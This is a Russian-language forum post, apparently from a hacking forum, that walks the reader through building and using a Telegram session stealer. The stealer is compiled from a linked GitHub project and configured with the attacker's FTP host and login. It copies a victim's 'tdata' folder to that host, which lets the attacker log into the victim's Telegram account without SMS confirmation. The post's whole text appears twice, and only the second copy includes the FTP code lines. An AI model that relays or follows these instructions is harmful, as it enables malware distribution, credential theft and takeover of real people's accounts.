applepiegangsta
Опытный user
- Регистрация
- 1 Май 2022
- Сообщения
- 166
- Реакции
- 1
Всем привет , мб эту тему уже все знают но все же , считаю своим долгом с вами этим поделится.
Для начала снова быстренько пробежимся по общей информации. Суть стиллера заключается в том, что при запуске жертвой .exe файла, программа проверяет наличие на пк Telegram и, если находит его, то копирует папку "tdata" и отправляет хозяину программы на сервер.
Для тех кто не знает, что это за папка и почему нам нужна именно она: при первом запуске Telegram на ПК у вас создается папка tdata, в которой хранится вся информация аккаунта, если злоумышленники украдут данную папку, то они смогут войти в аккаунт без смс подтверждения, ниже распишу об этом подробнее
Суть
Переходим по Ссылочке и скачиваем Visual Studio 2019.
Жмем "Скачать". После того как мы скачали студию, мы должны нажать на галочку
НАСТРОЙКА ХОСТИНГА
Итак, тут нам уже любой хостинг подходит, главное - FTP подключение. Я зарегался в VDSina, также могу порекомендовать TimeWeb (да-да он, не реклама так-то). Регаемся, создаем сайт, и получаем в панели управления данные для подключения к FTP.
Сохраняем наши данные, и переходим к коду.
Настройка и билд кода
Ссылка на код:
https://github.com/dogberttg/TeleSteal
Скачиваем, распаковываем архив, и открываем TeleSteal.sln через Visual Studio.
Выбираем Program.cs, листаем в самый низ кода, и мы должны увидеть этот блок. В эти три переменные мы вставляем данные от нашего FTP хоста.
В моем случае, это:
Все! Нам осталось выбрать сверху вместо Debug > Release, и нажать Ctrl + B, чтобы создать билд нашего кода.
После этого у вас сгенерируется файл TeleSteal.exe, он по умолчанию будет лежать в папке TeleSteal, которую мы скачали с гитхаба. Этот файл и является нашим вредоносом, название его можно менять. После того, как жертва запустит скрипт TeleSteal.exe ничего не произойдет, но это только на первый взгляд.
Чтобы получить ворованные данные - нам нужно зайти в файловый менеджер вашего хостинга (вам придёт столько папко tdata, сколько раз жертва запустит ваш файл)
У нас появился архив с папкой tdata, это папка с ПК жертвы, которая открыла ваш стиллер.
Скачиваем её на свой пк, распаковываем из архива все эти файлы, создаём папку с названием "tdata" и отправляем все эти файлы в папку.
Теперь мы можем войти в аккаунт жертвы, для этого мы скачиваем официальное приложение Telegram для ПК, не запускаем его, создаем новую папку, засовываем туда tdata с файлами жертвы и приложение Telegram.
Подсказка: если архив с тдатой весит меньше 6мб, то скорее-всего это пустой лог (то есть телеграм на пк жертвы есть, но он не авторизован).
Запускаем приложение Telegram, готово, мы в аккаунте жертвы!
Для начала снова быстренько пробежимся по общей информации. Суть стиллера заключается в том, что при запуске жертвой .exe файла, программа проверяет наличие на пк Telegram и, если находит его, то копирует папку "tdata" и отправляет хозяину программы на сервер.
Для тех кто не знает, что это за папка и почему нам нужна именно она: при первом запуске Telegram на ПК у вас создается папка tdata, в которой хранится вся информация аккаунта, если злоумышленники украдут данную папку, то они смогут войти в аккаунт без смс подтверждения, ниже распишу об этом подробнее
Суть
Переходим по Ссылочке и скачиваем Visual Studio 2019.
Жмем "Скачать". После того как мы скачали студию, мы должны нажать на галочку
НАСТРОЙКА ХОСТИНГА
Итак, тут нам уже любой хостинг подходит, главное - FTP подключение. Я зарегался в VDSina, также могу порекомендовать TimeWeb (да-да он, не реклама так-то). Регаемся, создаем сайт, и получаем в панели управления данные для подключения к FTP.
Сохраняем наши данные, и переходим к коду.
Настройка и билд кода
Ссылка на код:
https://github.com/dogberttg/TeleSteal
Скачиваем, распаковываем архив, и открываем TeleSteal.sln через Visual Studio.
Выбираем Program.cs, листаем в самый низ кода, и мы должны увидеть этот блок. В эти три переменные мы вставляем данные от нашего FTP хоста.
В моем случае, это:
Код:
host = "files.000wehhost.com"
login = "DOLFX"
pass = "тут мой пароль"Все! Нам осталось выбрать сверху вместо Debug > Release, и нажать Ctrl + B, чтобы создать билд нашего кода.
После этого у вас сгенерируется файл TeleSteal.exe, он по умолчанию будет лежать в папке TeleSteal, которую мы скачали с гитхаба. Этот файл и является нашим вредоносом, название его можно менять. После того, как жертва запустит скрипт TeleSteal.exe ничего не произойдет, но это только на первый взгляд.
Чтобы получить ворованные данные - нам нужно зайти в файловый менеджер вашего хостинга (вам придёт столько папко tdata, сколько раз жертва запустит ваш файл)
У нас появился архив с папкой tdata, это папка с ПК жертвы, которая открыла ваш стиллер.
Скачиваем её на свой пк, распаковываем из архива все эти файлы, создаём папку с названием "tdata" и отправляем все эти файлы в папку.
Теперь мы можем войти в аккаунт жертвы, для этого мы скачиваем официальное приложение Telegram для ПК, не запускаем его, создаем новую папку, засовываем туда tdata с файлами жертвы и приложение Telegram.
Подсказка: если архив с тдатой весит меньше 6мб, то скорее-всего это пустой лог (то есть телеграм на пк жертвы есть, но он не авторизован).
Запускаем приложение Telegram, готово, мы в аккаунте жертвы!
